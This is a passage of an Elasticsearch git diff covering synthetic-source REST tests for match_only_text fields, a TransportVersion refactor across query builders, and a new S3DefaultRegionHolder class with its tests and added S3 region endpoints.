ignore_above: 10 + fields: + text: + type: match_only_text + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo.text: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" +--- +synthetic_source match_only_text with multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with ignored multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + store: false + doc_values: true + ignore_above: 10 + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with stored multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + store: true + doc_values: false + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: "Apache Lucene powers Elasticsearch" + +--- +synthetic_source match_only_text with ignored stored multi-field: + - requires: + cluster_features: [ "mapper.source.mode_from_index_setting" ] + reason: "Source mode configured through index setting" + + - do: + indices.create: + index: synthetic_source_test + body: + settings: + index: + mapping.source.mode: synthetic + mappings: + properties: + foo: + type: match_only_text + fields: + raw: + type: keyword + store: true + doc_values: false + ignore_above: 10 + + - do: + index: + index: synthetic_source_test + id: "1" + refresh: true + body: + foo: "Apache Lucene powers Elasticsearch" + + - do: + search: + index: synthetic_source_test + body: + query: + match_phrase: + foo: apache lucene + + - match: { "hits.total.value": 1 } + - match: + hits.hits.0._source.foo: 
"Apache Lucene powers Elasticsearch" diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java index 71945ad395157..11dbaf7995248 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ChildrenAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -177,6 +176,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java index 881b22c8dfa22..7551734d09e84 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/aggregations/ParentAggregationBuilder.java @@ -11,7 +11,6 @@ import org.apache.lucene.search.Query; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -181,6 +180,6 @@ public String getType() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java index e2c93f4cad37a..137923a164848 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasChildQueryBuilder.java @@ -20,7 +20,6 @@ import org.apache.lucene.search.similarities.Similarity; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -543,6 +542,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java index fc15bb55f8703..c95e7eaa29fce 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/query/HasParentQueryBuilder.java @@ -13,7 +13,6 @@ import org.apache.lucene.search.join.ScoreMode; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; 
-import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -315,6 +314,6 @@ protected void extractInnerHitBuilders(Map inner @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java b/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java index 8ed22edec42e2..073a231bb8ce7 100644 --- a/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java +++ b/modules/parent-join/src/main/java/org/elasticsearch/join/query/ParentIdQueryBuilder.java @@ -17,7 +17,6 @@ import org.apache.lucene.search.TermQuery; import org.elasticsearch.ElasticsearchException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.ParsingException; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -195,6 +194,6 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java b/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java index c150f01153d35..468836232771e 100644 --- a/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java +++ b/modules/percolator/src/main/java/org/elasticsearch/percolator/PercolateQueryBuilder.java @@ -648,6 +648,6 @@ public void addNamedQuery(String name, Query query) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java b/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java index f72c68c6fd2e3..98af21b3877f5 100644 --- a/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java +++ b/modules/percolator/src/test/java/org/elasticsearch/percolator/PercolatorFieldMapperTests.java @@ -32,7 +32,6 @@ import org.apache.lucene.search.join.ScoreMode; import org.apache.lucene.util.BytesRef; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.support.PlainActionFuture; import org.elasticsearch.common.Strings; import org.elasticsearch.common.bytes.BytesArray; @@ -1212,7 +1211,7 @@ protected boolean doEquals(CustomParserQueryBuilder other) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/modules/repository-azure/build.gradle b/modules/repository-azure/build.gradle index 032b4e9c56319..4e0097905f09e 100644 --- a/modules/repository-azure/build.gradle +++ b/modules/repository-azure/build.gradle @@ -76,7 +76,7 @@ dependencies { api "net.minidev:accessors-smart:2.5.2" api "net.minidev:json-smart:2.5.2" api "org.codehaus.woodstox:stax2-api:4.2.2" - api "org.ow2.asm:asm:9.7.1" + api "org.ow2.asm:asm:9.8" runtimeOnly "com.google.code.gson:gson:2.11.0" runtimeOnly 
"org.cryptomator:siv-mode:1.5.2" diff --git a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java index c6c1868d5bbc1..493f4d10eea6d 100644 --- a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java +++ b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureBlobStoreRepositoryTests.java @@ -41,6 +41,7 @@ import org.elasticsearch.telemetry.Measurement; import org.elasticsearch.telemetry.TestTelemetryPlugin; import org.elasticsearch.test.BackgroundIndexer; +import org.elasticsearch.test.ESTestCase; import org.elasticsearch.threadpool.ThreadPool; import java.io.ByteArrayInputStream; @@ -73,6 +74,7 @@ import static org.hamcrest.Matchers.is; @SuppressForbidden(reason = "this test uses a HttpServer to emulate an Azure endpoint") +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class AzureBlobStoreRepositoryTests extends ESMockAPIBasedRepositoryIntegTestCase { protected static final String DEFAULT_ACCOUNT_NAME = "account"; diff --git a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java index 947f73c2ce580..5e3cad4534b7c 100644 --- a/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java +++ b/modules/repository-azure/src/internalClusterTest/java/org/elasticsearch/repositories/azure/AzureRepositoryMissingCredentialsIT.java @@ -18,12 +18,14 @@ import org.elasticsearch.plugins.Plugin; import org.elasticsearch.repositories.RepositoryVerificationException; import org.elasticsearch.test.ESIntegTestCase; +import org.elasticsearch.test.ESTestCase; import java.util.Collection; import static org.hamcrest.Matchers.allOf; import static org.hamcrest.Matchers.containsString; +@ESTestCase.WithoutEntitlements // due to dependency issue ES-12435 public class AzureRepositoryMissingCredentialsIT extends ESIntegTestCase { @Override diff --git a/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java b/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java index 420794ed75d75..f879477ab064b 100644 --- a/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java +++ b/modules/repository-s3/qa/insecure-credentials/src/test/java/org/elasticsearch/repositories/s3/RepositoryCredentialsTests.java @@ -12,6 +12,7 @@ import software.amazon.awssdk.auth.credentials.AwsCredentials; import software.amazon.awssdk.auth.credentials.AwsCredentialsProvider; import software.amazon.awssdk.http.SdkHttpClient; +import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.s3.S3Client; import org.apache.logging.log4j.LogManager; @@ -306,7 +307,7 @@ public static final class ProxyS3Service extends S3Service { ProjectResolver projectResolver, ResourceWatcherService resourceWatcherService ) { - super(environment, clusterService, projectResolver, resourceWatcherService, () -> null); + 
super(environment, clusterService, projectResolver, resourceWatcherService, () -> Region.of(randomIdentifier())); } @Override diff --git a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolder.java b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolder.java new file mode 100644 index 0000000000000..9a76616c3afb6 --- /dev/null +++ b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolder.java @@ -0,0 +1,61 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.repositories.s3; + +import software.amazon.awssdk.regions.Region; + +import org.elasticsearch.common.util.concurrent.RunOnce; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; + +import java.util.function.Supplier; + +/** + * Holds onto the {@link Region} provided by the given supplier (think: the AWS SDK's default provider chain) in case it's needed for a S3 + * repository. If the supplier fails with an exception, the first call to {@link #getDefaultRegion} will log a warning message recording + * the exception. + */ +class S3DefaultRegionHolder { + + private static final Logger logger = LogManager.getLogger(S3DefaultRegionHolder.class); + + // no synchronization required, assignments happen in start() which happens-before all reads + private Region defaultRegion; + private Runnable defaultRegionFailureLogger = () -> {}; + + private final Runnable initializer; + + /** + * @param delegateRegionSupplier Supplies a non-null {@link Region} or throws a {@link RuntimeException}. + *

+ * Retained until its first-and-only invocation when {@link #start()} is called, and then released. + */ + S3DefaultRegionHolder(Supplier<Region> delegateRegionSupplier) { + initializer = new RunOnce(() -> { + try { + defaultRegion = delegateRegionSupplier.get(); + assert defaultRegion != null; + } catch (Exception e) { + defaultRegion = null; + defaultRegionFailureLogger = new RunOnce(() -> logger.warn("failed to obtain region from default provider chain", e)); + } + }); + } + + void start() { + initializer.run(); + } + + Region getDefaultRegion() { + assert defaultRegion != null || defaultRegionFailureLogger instanceof RunOnce : "not initialized"; + defaultRegionFailureLogger.run(); + return defaultRegion; + } +} diff --git a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java index ab836040efa9a..59f12d2b9a716 100644 --- a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java +++ b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3RepositoryPlugin.java @@ -98,12 +98,7 @@ S3Service s3Service( } private static Region getDefaultRegion() { - try { - return DefaultAwsRegionProviderChain.builder().build().getRegion(); - } catch (Exception e) { - logger.info("failed to obtain region from default provider chain", e); - return null; - } + return DefaultAwsRegionProviderChain.builder().build().getRegion(); } @Override diff --git a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java index 51e1681129b82..fc18f4bc97a84 100644 --- a/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java +++ b/modules/repository-s3/src/main/java/org/elasticsearch/repositories/s3/S3Service.java @@ -48,7 +48,6 @@ import org.elasticsearch.common.component.AbstractLifecycleComponent; import org.elasticsearch.common.settings.Setting; import org.elasticsearch.common.settings.Settings; -import org.elasticsearch.common.util.concurrent.RunOnce; import org.elasticsearch.core.Nullable; import org.elasticsearch.core.Releasable; import org.elasticsearch.core.Releasables; @@ -94,8 +93,7 @@ class S3Service extends AbstractLifecycleComponent { Setting.Property.NodeScope ); - private final Runnable defaultRegionSetter; - private volatile Region defaultRegion; + private final S3DefaultRegionHolder defaultRegionHolder; /** * Use a signer that does not require to pre-read (and checksum) the body of PutObject and UploadPart requests since we can rely on @@ -129,7 +127,7 @@ class S3Service extends AbstractLifecycleComponent { compareAndExchangeTimeToLive = REPOSITORY_S3_CAS_TTL_SETTING.get(nodeSettings); compareAndExchangeAntiContentionDelay = REPOSITORY_S3_CAS_ANTI_CONTENTION_DELAY_SETTING.get(nodeSettings); isStateless = DiscoveryNode.isStateless(nodeSettings); - defaultRegionSetter = new RunOnce(() -> defaultRegion = defaultRegionSupplier.get()); + defaultRegionHolder = new S3DefaultRegionHolder(defaultRegionSupplier); s3ClientsManager = new S3ClientsManager( nodeSettings, this::buildClientReference, @@ -266,7 +264,7 @@ Region getClientRegion(S3ClientSettings clientSettings) { } else { endpointDescription = "no configured endpoint"; } - final var defaultRegion = this.defaultRegion; + final var defaultRegion = defaultRegionHolder.getDefaultRegion(); if (defaultRegion != null) { LOGGER.debug(""" found 
S3 client with no configured region and {}, using region [{}] from SDK""", endpointDescription, defaultRegion); @@ -415,7 +413,7 @@ public void onBlobStoreClose(@Nullable ProjectId projectId) { @Override protected void doStart() { - defaultRegionSetter.run(); + defaultRegionHolder.start(); } @Override diff --git a/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt b/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt index 3fae5c314c10b..5ca027a5f4a13 100644 --- a/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt +++ b/modules/repository-s3/src/main/resources/org/elasticsearch/repositories/s3/regions_by_endpoint.txt @@ -6,6 +6,10 @@ ap-east-1 s3-fips.ap-east-1.amazonaws.com ap-east-1 s3-fips.dualstack.ap-east-1.amazonaws.com ap-east-1 s3.ap-east-1.amazonaws.com ap-east-1 s3.dualstack.ap-east-1.amazonaws.com +ap-east-2 s3-fips.ap-east-2.amazonaws.com +ap-east-2 s3-fips.dualstack.ap-east-2.amazonaws.com +ap-east-2 s3.ap-east-2.amazonaws.com +ap-east-2 s3.dualstack.ap-east-2.amazonaws.com ap-northeast-1 s3-fips.ap-northeast-1.amazonaws.com ap-northeast-1 s3-fips.dualstack.ap-northeast-1.amazonaws.com ap-northeast-1 s3.ap-northeast-1.amazonaws.com @@ -56,6 +60,14 @@ aws-iso-b-global s3-fips.aws-iso-b-global.sc2s.sgov.gov aws-iso-b-global s3-fips.dualstack.aws-iso-b-global.sc2s.sgov.gov aws-iso-b-global s3.aws-iso-b-global.sc2s.sgov.gov aws-iso-b-global s3.dualstack.aws-iso-b-global.sc2s.sgov.gov +aws-iso-e-global s3-fips.aws-iso-e-global.cloud.adc-e.uk +aws-iso-e-global s3-fips.dualstack.aws-iso-e-global.cloud.adc-e.uk +aws-iso-e-global s3.aws-iso-e-global.cloud.adc-e.uk +aws-iso-e-global s3.dualstack.aws-iso-e-global.cloud.adc-e.uk +aws-iso-f-global s3-fips.aws-iso-f-global.csp.hci.ic.gov +aws-iso-f-global s3-fips.dualstack.aws-iso-f-global.csp.hci.ic.gov +aws-iso-f-global s3.aws-iso-f-global.csp.hci.ic.gov +aws-iso-f-global s3.dualstack.aws-iso-f-global.csp.hci.ic.gov aws-iso-global s3-fips.aws-iso-global.c2s.ic.gov aws-iso-global s3-fips.dualstack.aws-iso-global.c2s.ic.gov aws-iso-global s3.aws-iso-global.c2s.ic.gov @@ -76,6 +88,10 @@ cn-north-1 s3.cn-north-1.amazonaws.com.cn cn-north-1 s3.dualstack.cn-north-1.amazonaws.com.cn cn-northwest-1 s3.cn-northwest-1.amazonaws.com.cn cn-northwest-1 s3.dualstack.cn-northwest-1.amazonaws.com.cn +eusc-de-east-1 s3-fips.eusc-de-east-1.amazonaws.eu +eusc-de-east-1 s3-fips.dualstack.eusc-de-east-1.amazonaws.eu +eusc-de-east-1 s3.eusc-de-east-1.amazonaws.eu +eusc-de-east-1 s3.dualstack.eusc-de-east-1.amazonaws.eu eu-central-1 s3-fips.dualstack.eu-central-1.amazonaws.com eu-central-1 s3-fips.eu-central-1.amazonaws.com eu-central-1 s3.dualstack.eu-central-1.amazonaws.com diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java index 9fe0c40c83979..402181878b600 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/RegionFromEndpointGuesserTests.java @@ -9,6 +9,11 @@ package org.elasticsearch.repositories.s3; +import software.amazon.awssdk.endpoints.Endpoint; +import software.amazon.awssdk.regions.Region; +import software.amazon.awssdk.services.s3.endpoints.S3EndpointParams; +import 
software.amazon.awssdk.services.s3.endpoints.internal.DefaultS3EndpointProvider; + import org.elasticsearch.core.Nullable; import org.elasticsearch.test.ESTestCase; @@ -23,6 +28,14 @@ public void testRegionGuessing() { assertRegionGuess("random.endpoint.internal.net", null); } + public void testHasEntryForEachRegion() { + final var defaultS3EndpointProvider = new DefaultS3EndpointProvider(); + for (var region : Region.regions()) { + final Endpoint endpoint = safeGet(defaultS3EndpointProvider.resolveEndpoint(S3EndpointParams.builder().region(region).build())); + assertNotNull(region.id(), RegionFromEndpointGuesser.guessRegion(endpoint.url().toString())); + } + } + private static void assertRegionGuess(String endpoint, @Nullable String expectedRegion) { assertEquals(endpoint, expectedRegion, RegionFromEndpointGuesser.guessRegion(endpoint)); } diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java index 8cc19fd4c870d..4da5cb43e7f44 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3BlobContainerRetriesTests.java @@ -101,6 +101,7 @@ import static org.elasticsearch.repositories.s3.S3ClientSettings.MAX_CONNECTIONS_SETTING; import static org.elasticsearch.repositories.s3.S3ClientSettings.MAX_RETRIES_SETTING; import static org.elasticsearch.repositories.s3.S3ClientSettings.READ_TIMEOUT_SETTING; +import static org.elasticsearch.repositories.s3.S3ClientSettingsTests.DEFAULT_REGION_UNAVAILABLE; import static org.hamcrest.Matchers.allOf; import static org.hamcrest.Matchers.anyOf; import static org.hamcrest.Matchers.contains; @@ -134,7 +135,7 @@ public void setUp() throws Exception { ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), TestProjectResolvers.DEFAULT_PROJECT_ONLY, Mockito.mock(ResourceWatcherService.class), - () -> null + DEFAULT_REGION_UNAVAILABLE ) { private InetAddress[] resolveHost(String host) throws UnknownHostException { assertEquals("127.0.0.1", host); @@ -1323,7 +1324,7 @@ public void testRetryOn403InStateless() { ), TestProjectResolvers.DEFAULT_PROJECT_ONLY, Mockito.mock(ResourceWatcherService.class), - () -> null + DEFAULT_REGION_UNAVAILABLE ); service.start(); recordingMeterRegistry = new RecordingMeterRegistry(); diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java index 26b9aab5569e1..927ef00b1106a 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ClientSettingsTests.java @@ -13,6 +13,7 @@ import software.amazon.awssdk.auth.credentials.AwsSessionCredentials; import software.amazon.awssdk.regions.Region; +import org.elasticsearch.ElasticsearchException; import org.elasticsearch.cluster.project.TestProjectResolvers; import org.elasticsearch.common.settings.MockSecureSettings; import org.elasticsearch.common.settings.Settings; @@ -24,6 +25,7 @@ import org.mockito.Mockito; import java.util.Map; +import java.util.function.Supplier; import static org.hamcrest.Matchers.contains; import static org.hamcrest.Matchers.emptyString; @@ -190,9 +192,11 @@ public 
void testRegionCanBeSet() { ClusterServiceUtils.createClusterService(new DeterministicTaskQueue().getThreadPool()), TestProjectResolvers.DEFAULT_PROJECT_ONLY, Mockito.mock(ResourceWatcherService.class), - () -> null + DEFAULT_REGION_UNAVAILABLE ) ) { + s3Service.start(); + var otherSettings = settings.get("other"); Region otherRegion = s3Service.getClientRegion(otherSettings); assertEquals(randomRegion, otherRegion.toString()); @@ -213,4 +217,8 @@ public void testMaxConnectionsCanBeSet() { // the default appears in the docs so let's make sure it doesn't change: assertEquals(50, S3ClientSettings.Defaults.MAX_CONNECTIONS); } + + public static final Supplier<Region> DEFAULT_REGION_UNAVAILABLE = () -> { + throw new ElasticsearchException("default region unavailable in this test"); + }; } diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolderTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolderTests.java new file mode 100644 index 0000000000000..3471ce0205b06 --- /dev/null +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3DefaultRegionHolderTests.java @@ -0,0 +1,85 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.repositories.s3; + +import software.amazon.awssdk.regions.Region; + +import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.core.LogEvent; +import org.elasticsearch.ElasticsearchException; +import org.elasticsearch.test.ESTestCase; +import org.elasticsearch.test.MockLog; + +import java.util.concurrent.atomic.AtomicBoolean; + +public class S3DefaultRegionHolderTests extends ESTestCase { + public void testSuccess() { + try (var mockLog = MockLog.capture(S3DefaultRegionHolder.class)) { + mockLog.addExpectation(new NoLogEventsExpectation()); + + final var region = Region.of(randomIdentifier()); + final var regionSupplied = new AtomicBoolean(); + final var regionHolder = new S3DefaultRegionHolder(() -> { + assertTrue(regionSupplied.compareAndSet(false, true)); // only called once + return region; + }); + + regionHolder.start(); + assertTrue(regionSupplied.get()); + assertSame(region, regionHolder.getDefaultRegion()); + assertSame(region, regionHolder.getDefaultRegion()); + + mockLog.assertAllExpectationsMatched(); + } + } + + public void testFailure() { + try (var mockLog = MockLog.capture(S3DefaultRegionHolder.class)) { + final var warningSeenExpectation = new MockLog.EventuallySeenEventExpectation( + "warning", + S3DefaultRegionHolder.class.getCanonicalName(), + Level.WARN, + "failed to obtain region from default provider chain" + ); + mockLog.addExpectation(warningSeenExpectation); + + final var regionSupplied = new AtomicBoolean(); + final var regionHolder = new S3DefaultRegionHolder(() -> { + assertTrue(regionSupplied.compareAndSet(false, true)); // only called once + throw new ElasticsearchException("simulated"); + }); + + regionHolder.start(); + assertTrue(regionSupplied.get()); + + warningSeenExpectation.setExpectSeen(); // not seen yet, but will be seen now + regionHolder.getDefaultRegion(); + +
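+            // What testFailure drives home, per S3DefaultRegionHolder above: start() runs the
+            // supplier exactly once via RunOnce, a failure stores a one-shot warning logger in
+            // place of a region, and the getDefaultRegion() call above therefore returned null
+            // and logged the warning a single time. A minimal success-path sketch, assuming
+            // only the Supplier<Region> contract shown in this diff (Region.US_EAST_1 is a
+            // standard AWS SDK v2 constant):
+            //   var holder = new S3DefaultRegionHolder(() -> Region.US_EAST_1);
+            //   holder.start();                    // supplier invoked once, then released
+            //   var r = holder.getDefaultRegion(); // returns US_EAST_1, logs nothing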
mockLog.addExpectation(new NoLogEventsExpectation()); // log message not duplicated + regionHolder.getDefaultRegion(); + + mockLog.assertAllExpectationsMatched(); + } + } + + private static class NoLogEventsExpectation implements MockLog.LoggingExpectation { + private boolean seenLogEvent; + + @Override + public void match(LogEvent event) { + seenLogEvent = true; + } + + @Override + public void assertMatched() { + assertFalse(seenLogEvent); + } + } +} diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java index d41631a79739f..7beb5ec58af20 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3RepositoryTests.java @@ -10,6 +10,7 @@ package org.elasticsearch.repositories.s3; import software.amazon.awssdk.http.SdkHttpClient; +import software.amazon.awssdk.regions.Region; import software.amazon.awssdk.services.s3.S3Client; import org.elasticsearch.cluster.metadata.ProjectId; @@ -68,7 +69,7 @@ private static class DummyS3Service extends S3Service { ProjectResolver projectResolver, ResourceWatcherService resourceWatcherService ) { - super(environment, clusterService, projectResolver, resourceWatcherService, () -> null); + super(environment, clusterService, projectResolver, resourceWatcherService, () -> Region.of(randomIdentifier())); } @Override diff --git a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java index 6c663c1594102..e7e0e206aa24b 100644 --- a/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java +++ b/modules/repository-s3/src/test/java/org/elasticsearch/repositories/s3/S3ServiceTests.java @@ -19,6 +19,8 @@ import software.amazon.awssdk.services.s3.model.S3Exception; import org.apache.logging.log4j.Level; +import org.apache.logging.log4j.core.LogEvent; +import 